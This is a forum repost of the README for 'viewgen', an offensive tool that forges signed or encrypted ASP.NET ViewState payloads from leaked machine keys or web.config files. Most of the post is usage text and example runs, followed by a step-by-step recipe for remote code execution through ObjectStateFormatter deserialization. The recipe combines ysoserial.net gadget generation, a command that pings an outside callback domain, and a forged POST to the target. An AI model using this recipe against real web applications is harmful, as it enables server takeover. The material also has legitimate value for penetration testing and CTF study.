Nytro Posted April 24, 2019 Report Share Posted April 24, 2019 viewgen ASP.NET ViewState Generator viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files Requirements: Python 3 Installation pip3 install --upgrade -r requirements.txt or ./install.sh Usage $ viewstate -h usage: viewgen [-h] [--webconfig WEBCONFIG] [-m MODIFIER] [-c COMMAND] [--decode] [--guess] [--check] [--vkey VKEY] [--valg VALG] [--dkey DKEY] [--dalg DALG] [-e] [payload] viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files positional arguments: payload ViewState payload (base 64 encoded) optional arguments: -h, --help show this help message and exit --webconfig WEBCONFIG automatically load keys and algorithms from a web.config file -m MODIFIER, --modifier MODIFIER VIEWSTATEGENERATOR value -c COMMAND, --command COMMAND Command to execute --decode decode a ViewState payload --guess guess signature and encryption mode for a given payload --check check if modifier and keys are correct for a given payload --vkey VKEY validation key --valg VALG validation algorithm --dkey DKEY decryption key --dalg DALG decryption algorithm -e, --encrypted ViewState is encrypted Examples $ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=" [+] ViewState (('1628925133', (None, [3, (['enctype', 'multipart/form-data'], None)])), None) [+] Signature 7441f6eeb4fab5a5f30d6ba99908c08eb683b9e6 [+] Signature match $ viewgen --webconfig web.config --modifier CA0B0334 "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk" r4zCP5CdSo5R9XmiEXvp1LHVzX1uICmY7oW2WD/gKS/Mt/s+NKXrMpScr4Gvrji7lFdHPOttFpi2x7YbmQjEjJ2NdBMuzeKFzIuno2DenYF8yVVKx5+LL7LYmI0CVcNQ+jH8VxvzVG58NQIJ/rSr6NqNMBahrVfAyVPgdL4Eke3Bq4XWk6BYW2Bht6ykSHF9szT8tG6KUKwf+T94hFUFNIXXkURptwQJEC/5AMkFXMU0VXDa $ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI=" [+] ViewState is not encrypted [+] Signature algorithm: SHA1 $ viewgen --guess "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY=" [!] ViewState is encrypted [+] Algorithm candidates: AES SHA1 DES/3DES SHA1 Achieving Remote Code Execution Leaking the web.config file or validation keys from ASP.NET apps results in RCE via ObjectStateFormatter deserialization if ViewStates are used. You can use the built-in command option (ysoserial.net based) to generate a payload: $ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld" However, you can also generate it manually: 1 - Generate a payload with ysoserial.net: > ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "ping yourdomain.tld" 2 - Grab a modifier (__VIEWSTATEGENERATOR value) from a given endpoint of the webapp 3 - Generate the signed/encrypted payload: $ viewgen --webconfig web.config --modifier MODIFIER PAYLOAD 4 - Send a POST request with the generated ViewState to the same endpoint 5 - Profit 🎉🎉 Thanks @orange_8361, the author of Why so Serials (HITCON CTF 2018) @infosec_au @smiegles BBAC CTF Writeups about this technique https://xz.aliyun.com/t/3019 https://cyku.tw/ctf-hitcon-2018-why-so-serials/ Talks about this technique https://illuminopi.com/assets/files/BSidesIowa_RCEvil.net_20190420.pdf https://speakerdeck.com/pwntester/dot-net-serialization-detecting-and-defending-vulnerable-endpoints  Sursa: https://github.com/0xACB/viewgen Quote Link to comment Share on other sites More sharing options...